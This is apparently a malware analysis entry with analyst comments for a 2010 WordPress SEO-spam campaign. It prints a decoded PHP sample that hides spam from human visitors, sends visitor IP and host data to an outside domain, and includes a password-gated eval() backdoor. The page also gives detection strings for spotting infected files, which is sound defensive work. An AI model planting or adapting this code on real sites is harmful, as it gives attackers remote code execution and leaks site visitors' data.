Description: malware used in a large-scale SEO spam campaign. Background write-ups:
http://blog.sucuri.net/2010/05/seo-spam-network-code-used-and-more.html
http://blog.sucuri.net/2010/05/seo-spam-network-details-of-wp-includes.html
http://blog.sucuri.net/2010/05/it-is-not-over-seo-spam-on-sites.html
The file has a random name and is typically hidden in the site's top-level directory (kip.php, fwwkd.php, mrsk.php, .data.php, etc.), inside wp-content/uploads (fonction.php, wp-links.php, etc.) or inside a randomly named directory under wp-includes. It has also been found as wp-includes/index.php. Because the file name varies, hunt for strings the code itself carries (for example `mr_no`, `mrobh`, `mmmakowoiwow`, `ZHZjNDRmdGdyLmNvbQ==`) rather than for a file name.
In some variants the spam links are fetched from http://dvc44ftgr.com/ (the domain is base64-encoded in the code, and the request leaks the visitor's IP address, the site's host name and the user agent). Note that the same code also contains a password-gated eval() backdoor, so a site carrying this file should be treated as fully compromised, not merely as serving spam.
Affecting: Any WordPress hacked during Feb/Mar/Apr/May 2010
Malware dump:
Decoded text:
// ANALYST NOTES (review): this is a decoded malware sample, reproduced as dumped.
// Do not "fix" it; it is kept verbatim so it can be matched against infected files.
// It is a WordPress output-buffer hook that (1) injects remotely fetched SEO spam
// into every page served to a crawler-like User-Agent, and (2) exposes a remote
// code-execution backdoor via eval() to a client who knows a password.
// The blog rendering has replaced straight quotes with curly quotes, dropped the "$"
// on the GLOBALS line and the backslash of "\n" literals, so this text is not
// byte-exact PHP; the original sample presumably was (TODO confirm against a raw copy).
if(function_exists(‘ob_start’)&&!isset($GLOBALS['mr_no']))
{
// Run-once guard: the same payload is dropped into several files (see description),
// so this global stops the buffer callback from being registered more than once.
GLOBALS['mr_no']=1;
if(!function_exists(‘mrobh’))
{
if(!function_exists(‘gml’))
{
// gml(): returns the HTML fragment to inject into the page ("" / nothing otherwise).
function gml()
{
// Cloaking: only requests whose User-Agent contains "googlebot" or "yahoo"
// (case-insensitive substring, trivially spoofable) get anything injected; normal
// visitors and the site owner see an untouched page, which hides the infection.
if(stristr($_SERVER["HTTP_USER_AGENT"],”googlebot”)||stristr($_SERVER["HTTP_USER_AGENT"],”yahoo”))
{
// BACKDOOR: if the "mmmakowoiwow002" request parameter md5-hashes to the constant
// below and "mmmakowoiwow001" is present, the latter is base64-decoded and passed
// to eval(). Both GET and POST are accepted ($_REQUEST). The plaintext password
// is not in the sample, only its md5. The result of the eval'd code is returned
// straight into the response body (prefixed with "Execution..."), so the attacker
// sees command output in the page. The trailing "n" was presumably "\n".
if((md5($_REQUEST["mmmakowoiwow002"])==”a3934dbe20b0b3e9bbe7a9efcc6526f4″)&&
(isset($_REQUEST["mmmakowoiwow001"])))
{
$R8725029EA89712EED8670BAE64D30E47=base64_decode($_REQUEST["mmmakowoiwow001"]);
return “Execution…$R8725029EA89712EED8670BAE64D30E47n”.eval($R8725029EA89712EED8670BAE64D30E47);
}
// Spam source: "ZHZjNDRmdGdyLmNvbQ==" decodes to "dvc44ftgr.com". The URL is
// http://dvc44ftgr.com/links/<0..250>.txt and it leaks the visitor's IP, the
// requested Host header and the User-Agent as query parameters (beaconing).
$RAF63EAA7A2D15CA59ABB95B6FD1AFEBF=”http://”.base64_decode(“ZHZjNDRmdGdyLmNvbQ==”).”/links/”.rand(0,250).”.txt?ip=”.$_SERVER["REMOTE_ADDR"].”&host=”.rawurlencode($_SERVER["HTTP_HOST"]).”&agent=”.rawurlencode($_SERVER["HTTP_USER_AGENT"]);
$RF48BFF9055F46B9483BC90DC0A160E67=”";
// Fetch the spam text with cURL when available (15 s timeout, gzip accepted),
// otherwise with file_get_contents(). All errors are silenced with "@" so a dead
// C2 host simply yields an empty string and leaves no trace in the error log.
if (function_exists(“curl_init”))
{
$R7DF481D066138CF7B5D7DA19BCB2A874 = @curl_init();
@curl_setopt ($R7DF481D066138CF7B5D7DA19BCB2A874, CURLOPT_URL, $RAF63EAA7A2D15CA59ABB95B6FD1AFEBF);
@curl_setopt ($R7DF481D066138CF7B5D7DA19BCB2A874, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt ($R7DF481D066138CF7B5D7DA19BCB2A874, CURLOPT_TIMEOUT, 15);
@curl_setopt ($R7DF481D066138CF7B5D7DA19BCB2A874, CURLOPT_ENCODING , “gzip”);
$RF48BFF9055F46B9483BC90DC0A160E67=@curl_exec ($R7DF481D066138CF7B5D7DA19BCB2A874);
@curl_close ($R7DF481D066138CF7B5D7DA19BCB2A874);
}
else
{
$RF48BFF9055F46B9483BC90DC0A160E67=@file_get_contents($RAF63EAA7A2D15CA59ABB95B6FD1AFEBF);
}
}
// For non-crawler requests the variable above was never assigned, so this returns
// an unset value (empty when concatenated) and the page is left unmodified.
return $RF48BFF9055F46B9483BC90DC0A160E67;
}
}
// The line below holds three more pieces, collapsed by the rendering:
//  * gzdecode() polyfill (only defined if PHP lacks it): reads the gzip flag byte,
//    skips the optional header fields it signals (extra field, NUL-terminated name
//    and comment, header CRC) and gzinflate()s the rest; on failure it returns the
//    input unchanged, so non-gzip buffers pass through untouched.
//  * mrobh(): the output-buffer callback. Sends "Content-Encoding: none", gunzips
//    the buffer (presumably to cope with sites already using a gzip handler — TODO
//    confirm), then inserts gml()'s output immediately before the "</body" tag, or
//    appends it to the end of the buffer if no such tag exists.
//  * ob_start('mrobh'): registers the callback, so every page served while this
//    file is included passes through mrobh() on the way out.
if(!function_exists(‘gzdecode’)){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack(‘v’,substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header(‘Content-Encoding: none’); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match(‘/</body/si’,$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace(‘/(</body[^>]*>)/si’,gml().”n”.’$1′,$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start(‘mrobh’); } }